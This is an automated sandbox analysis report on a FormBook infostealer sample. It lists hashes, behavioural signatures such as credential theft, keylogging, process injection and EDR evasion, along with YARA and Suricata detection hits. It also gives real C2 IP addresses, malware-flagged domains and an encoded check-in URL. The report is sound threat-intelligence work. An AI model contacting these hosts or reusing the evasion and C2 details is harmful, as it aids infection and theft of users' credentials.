Edit tour

Windows Analysis Report
6ddrUd6iQo.exe

Overview

General Information

Sample name:	6ddrUd6iQo.exe renamed because original name is a hash value
Original sample name:	ee18930ee603d14401820554e2d003eb06efc51ee4b90071b178f6da05ae067b.exe
Analysis ID:	1486669
MD5:	f00fb34d9a82c351b6d65f60e494c41c
SHA1:	2abfa0b1579544b6b9ed5e58971e5412943ee2da
SHA256:	ee18930ee603d14401820554e2d003eb06efc51ee4b90071b178f6da05ae067b
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

6ddrUd6iQo.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\6ddrUd6iQo.exe" MD5: F00FB34D9A82C351B6D65F60E494C41C)

svchost.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\6ddrUd6iQo.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

wEnggOkwNlJAef.exe (PID: 5772 cmdline: "C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

msinfo32.exe (PID: 5848 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5C49B7B55D4AF40DB1047E08484D6656)

firefox.exe (PID: 2896 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1455f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1a6d2b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18f7da:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1a6d2b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18f7da:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1455f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1455f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bab0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1455f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x68240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x50cef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f013:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17ac2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e213:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16cc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f013:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17ac2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\6ddrUd6iQo.exe", CommandLine: "C:\Users\user\Desktop\6ddrUd6iQo.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\6ddrUd6iQo.exe", ParentImage: C:\Users\user\Desktop\6ddrUd6iQo.exe, ParentProcessId: 6632, ParentProcessName: 6ddrUd6iQo.exe, ProcessCommandLine: "C:\Users\user\Desktop\6ddrUd6iQo.exe", ProcessId: 6676, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\6ddrUd6iQo.exe", CommandLine: "C:\Users\user\Desktop\6ddrUd6iQo.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\6ddrUd6iQo.exe", ParentImage: C:\Users\user\Desktop\6ddrUd6iQo.exe, ParentProcessId: 6632, ParentProcessName: 6ddrUd6iQo.exe, ProcessCommandLine: "C:\Users\user\Desktop\6ddrUd6iQo.exe", ProcessId: 6676, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.254.38.5

Timestamp:	2024-08-02T13:42:02.642634+0200
SID:	2855464
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.75.234

Timestamp:	2024-08-02T13:43:19.334182+0200
SID:	2855464
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.42.108.46

Timestamp:	2024-08-02T13:43:04.740010+0200
SID:	2855464
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-02T13:41:38.139970+0200
SID:	2855464
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.254.38.5

Timestamp:	2024-08-02T13:42:05.078384+0200
SID:	2855465
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 66.235.200.145

Timestamp:	2024-08-02T13:42:38.301795+0200
SID:	2855464
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.148.243

Timestamp:	2024-08-02T13:42:49.768237+0200
SID:	2855464
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.71.177.176

Timestamp:	2024-08-02T13:42:24.891934+0200
SID:	2855464
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.75.234

Timestamp:	2024-08-02T13:43:21.672615+0200
SID:	2855464
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.254.38.5

Timestamp:	2024-08-02T13:41:57.333748+0200
SID:	2855464
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 66.235.200.145

Timestamp:	2024-08-02T13:42:33.330127+0200
SID:	2855464
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 103.42.108.46

Timestamp:	2024-08-02T13:43:09.991405+0200
SID:	2855465
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.148.243

Timestamp:	2024-08-02T13:42:55.551567+0200
SID:	2855465
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.71.177.176

Timestamp:	2024-08-02T13:42:22.289603+0200
SID:	2855464
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 103.71.177.176

Timestamp:	2024-08-02T13:42:27.430805+0200
SID:	2855465
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-02T13:41:40.780194+0200
SID:	2855464
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 85.159.66.93

Timestamp:	2024-08-02T13:41:14.592427+0200
SID:	2855465
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.71.177.176

Timestamp:	2024-08-02T13:42:19.719719+0200
SID:	2855464
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.148.243

Timestamp:	2024-08-02T13:42:52.357367+0200
SID:	2855464
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-02T13:41:35.571147+0200
SID:	2855464
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 66.235.200.145

Timestamp:	2024-08-02T13:42:41.072990+0200
SID:	2855465
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 66.235.200.145

Timestamp:	2024-08-02T13:42:35.909012+0200
SID:	2855464
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.42.108.46

Timestamp:	2024-08-02T13:43:02.167722+0200
SID:	2855464
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-02T13:41:43.272155+0200
SID:	2855465
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.254.38.5

Timestamp:	2024-08-02T13:41:59.909829+0200
SID:	2855464
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.148.243

Timestamp:	2024-08-02T13:42:47.191324+0200
SID:	2855464
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 162.241.75.234 - Destination IP: 192.168.2.4

Timestamp:	2024-08-02T13:43:21.673188+0200
SID:	2012510
Source Port:	80
Destination Port:	49763
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.42.108.46

Timestamp:	2024-08-02T13:43:07.305200+0200
SID:	2855464
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.techcadweb.tech/14e7/	Avira URL Cloud: Label: malware
Source: http://www.techcadweb.tech/14e7/?SXqH06e=bCPQ5+1rXgIzzb6Yab0pbAhhQb9XrByT/Ak2H+GAO5bcJYJuu6EdQZ+EA6E6dYH2KOSHyjKcRtCqIh6kAwLxr/W5k5rXUDR6Bybr1Ao3GXQhCERrhJ9UbaA=&AV=_ng4uzR8Zz	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.php

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for submitted file

Source: 6ddrUd6iQo.exe	Virustotal: Detection: 67%			Perma Link
Source: 6ddrUd6iQo.exe	ReversingLabs: Detection: 57%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 6ddrUd6iQo.exe

Joe Sandbox ML: detected

Source: 6ddrUd6iQo.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: msinfo32.pdb source: svchost.exe, 00000001.00000003.1991673344.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1991814500.000000000306D000.00000004.00000020.00020000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000003.1962939041.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wEnggOkwNlJAef.exe, 00000005.00000000.1945157195.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 6ddrUd6iQo.exe, 00000000.00000003.1658586506.0000000004390000.00000004.00001000.00020000.00000000.sdmp, 6ddrUd6iQo.exe, 00000000.00000003.1660777950.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2024475537.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2024475537.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791548848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1801526478.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3511277033.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2033794892.0000000004A83000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2024842442.00000000048D7000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3511277033.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 6ddrUd6iQo.exe, 00000000.00000003.1658586506.0000000004390000.00000004.00001000.00020000.00000000.sdmp, 6ddrUd6iQo.exe, 00000000.00000003.1660777950.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2024475537.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2024475537.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791548848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1801526478.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, msinfo32.exe, 00000006.00000002.3511277033.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2033794892.0000000004A83000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2024842442.00000000048D7000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3511277033.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000004F4C000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3508575793.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.000000000525C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2494932075.00000000011EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000004F4C000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3508575793.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.000000000525C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2494932075.00000000011EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: msinfo32.pdbGCTL source: svchost.exe, 00000001.00000003.1991673344.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1991814500.000000000306D000.00000004.00000020.00020000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000003.1962939041.00000000007FB000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00334696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00334696
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033C93C FindFirstFileW,FindClose,	0_2_0033C93C
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0033C9C7
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0033F200
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0033F35D
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0033F65E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00333A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00333A2B
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00333D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00333D4E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0033BF27
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C1C4C0 FindFirstFileW,FindNextFileW,FindClose,	6_2_02C1C4C0

Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 4x nop then pop edi	5_2_073C0F2B
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 4x nop then xor eax, eax	5_2_073C6330
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 4x nop then xor eax, eax	6_2_02C09BA0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 4x nop then pop edi	6_2_02C0E0C2
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_04B204E8

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.hpo0snermcvqv.xyz

Source: Joe Sandbox View	IP Address: 162.241.148.243 162.241.148.243
Source: Joe Sandbox View	IP Address: 162.241.148.243 162.241.148.243
Source: Joe Sandbox View	IP Address: 66.235.200.145 66.235.200.145
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_003425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_003425E2

